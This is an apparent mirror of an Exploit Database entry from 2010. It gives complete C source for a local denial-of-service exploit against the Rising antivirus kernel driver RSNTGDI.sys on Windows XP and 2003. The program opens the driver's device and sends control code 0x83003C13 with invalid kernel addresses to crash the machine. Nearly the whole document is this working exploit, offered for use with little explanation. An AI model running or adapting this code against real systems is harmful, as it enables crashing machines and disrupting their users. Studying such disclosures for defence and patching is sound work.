Rising – ‘RSNTGDI.sys’ Local Denial of Service

• Exploit Database
• 151 阅读

• 作者： ze0r
  日期： 2010-11-02
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/15383/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

  /* On the net.We can found these file has published a BUG.In that.The BUG has found in CONTROL CODE:0x83003C0B.So.I check these file in othere CONTROL CODE.Just for fun.....   # Exploit Title: [Rising RSNTGDI.sys Local Denial of Service(CONTROL CODE:83003C13) ] # Date: [2010.11.1] # Author: [ ze0r ] # Version: [Rising 2009.Publish Date:2009.10.13.] # Tested on: [Windows XPSP3 Chinese Simplified & Windows 2003 Chinese Simplified] */     #include "stdio.h" #include "windows.h"   HANDLE DriverHandle =0;   void boom(PVOID systembuffer,PVOID userbuffer) { printf("userbuffer Is:%p\n\n",userbuffer); printf("The systembuffer Is:%p\n\n",systembuffer); DeviceIoControl(DriverHandle, 0x83003C13, systembuffer, 20, userbuffer, 20, (DWORD *)0, 0); return ; }   int main(int argc, char* argv[]) { printf("-------------------------------------------------------------------------------\n"); printf("---------------------------C0ed By:ze0r,Let's ROCK!!---------------------------\n"); printf("----------------------------------QQ:289791332---------------------------------\n"); printf("-------------------------------------------------------------------------------\n\n"); DriverHandle=CreateFile("\\\\.\\rsntgdi", 0, FILE_SHARE_READ | FILE_SHARE_WRITE , 0, OPEN_EXISTING,0,0); if (DriverHandle == INVALID_HANDLE_VALUE) { printf("Open Driver Error!\n\n"); return 0 ; } printf("OK.Let's Crash It!\n\n"); getchar();   boom((PVOID)0x88888888,(PVOID)0x88888888); return 0; }